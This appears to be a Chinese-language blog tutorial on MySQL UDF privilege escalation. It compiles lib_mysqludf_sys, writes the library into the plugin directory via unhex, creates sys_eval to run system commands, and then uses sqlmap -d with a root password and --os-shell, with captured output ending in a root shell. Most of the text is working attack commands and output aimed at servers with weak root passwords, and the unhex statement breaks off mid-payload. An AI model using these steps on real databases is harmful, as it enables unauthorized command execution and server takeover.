UDF是MySQL的一个共享库,通过udf创建能够执行系统命令的函数sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的shell执行权限
网上有些文章利用的是sqlmap-master\udf\mysql\linux\64的lib_mysqludf_sys.so_文件,但是测试中发现会报错
mysql> create function sys_eval returns string soname 'udf.so';
ERROR 1126 (HY000): Can't open shared library 'udf.so' (errno: 22 /usr/lib64/mysql/plugin/udf.so: invalid ELF header)
下载lib_mysqludf_sys程序:https://github.com/mysqludf/lib_mysqludf_sys
解压文件,在源码目录里编译源代码:
gcc -DMYSQL_DYNAMIC_PLUGIN -fPIC -Wall -I/usr/include/mysql -I. -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so
注意:在编译源码时,可能会出现如下错误
In file included from lib_mysqludf_sys.c:40:
/usr/include/mysql/my_global.h:626:25: error: my_compiler.h: No such file or directory
这是一个mysql的bug引起的错误,只要修改/usr/include/mysql/my_global.h文件,注释掉626行重新编译就可以了。
生成文件lib_mysqludf_sys.so后,使用Hex.hta获取16进制
mysql> show variables like '%plugin%';
+---------------+-------------------------+
| Variable_name | Value |
+---------------+-------------------------+
| plugin_dir | /usr/lib64/mysql/plugin |
+---------------+-------------------------+
1 row in set (0.00 sec)
mysql> select * from func; #检查是否已经有人导出过了
mysql> select unhex('7F454C
Query OK, 1 row affected (0.01 sec)#需要有/usr/lib64/mysql/plugin/目录的写入权限
mysql> create function sys_eval returns string soname 'mysqludf.so';
Query OK, 0 rows affected (0.00 sec)
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql
+--------------------+
1 row in set (0.03 sec)
mysql> select * from func;
+----------+-----+-------------+----------+
| name | ret | dl | type |
+----------+-----+-------------+----------+
| sys_eval | 0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set (0.00 sec)
mysql> drop function sys_eval;
Query OK, 0 rows affected (0.00 sec)
mysql> select * from func;
Empty set (0.00 sec)
限制条件:
1)mysql root账号弱口令
2)mysql启动账户需要有插件目录的写入权限,例如yum安装的mysql
[root@template tmp]# ls -ald /usr/lib64/mysql/plugin
drwxr-xr-x. 2 root root 4096 4月 25 08:33 /usr/lib64/mysql/plugin
而mysql的默认启动账户是mysql,是没有写入权限的。
另外UDF提权可以直接使用sqlmap -d参数执行
语法为:” DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME” 或者是”DBMS://DATABASE_FILEPATH”。
[1]dbms:代表所使用的数据库,如我们这里是mysql
[2]user:对应我们数据库的用户,如我们这里是root
[3]password:对应我们数据的密码,如我的服务器为Hehe123456
[4]dbma_IP:数据库服务器对应的ip地址,如我这里为192.168.192.120
[5]dbms_PORT:数据服务器所使用的端口
[6]database_NAME:你要使用的数据库名
这里直接使用Kali下的Sqlmap验证:
root@kali:~# sqlmap -d "mysql://root:Hehe123456@192.168.192.120:3306/test" --os-shell
___
__H__
___ ___[']_____ ___ ___ {1.1.3#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 16:56:51
[16:56:51] [INFO] connection to mysql server 192.168.192.120:3306 established
[16:56:51] [INFO] testing MySQL
[16:56:51] [INFO] confirming MySQL
[16:56:51] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[16:56:51] [INFO] fingerprinting the back-end DBMS operating system
[16:56:51] [INFO] the back-end DBMS operating system is Linux
[16:56:51] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapfile'")
[16:56:51] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapfilehex'")
[16:56:51] [INFO] testing if current user is DBA
[16:56:51] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 2
[16:56:57] [INFO] checking if UDF 'sys_eval' already exist
[16:56:57] [INFO] checking if UDF 'sys_exec' already exist
[16:56:57] [INFO] detecting back-end DBMS version from its banner
[16:56:57] [INFO] retrieving MySQL plugin directory absolute path
[16:56:57] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapfile'")
[16:56:58] [INFO] the local file '/tmp/sqlmap6szFlF1831/lib_mysqludf_syswZxteE.so' and the remote file '/usr/lib64/mysql/plugin/libsmuur.so' have the same size (8040 B)
[16:56:58] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapfilehex'")
[16:56:58] [INFO] creating UDF 'sys_eval' from the binary UDF file
[16:56:58] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1305, 'FUNCTION test.sys_eval does not exist')
[16:56:58] [INFO] creating UDF 'sys_exec' from the binary UDF file
[16:56:58] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1305, 'FUNCTION test.sys_exec does not exist')
[16:56:58] [WARNING] (remote) (_mysql_exceptions.OperationalError) (1051, "Unknown table 'sqlmapoutput'")
[16:56:58] [INFO] going to use injected sys_eval and sys_exec user-defined functions for operating system command execution
[16:56:58] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] Y
command standard output: 'root'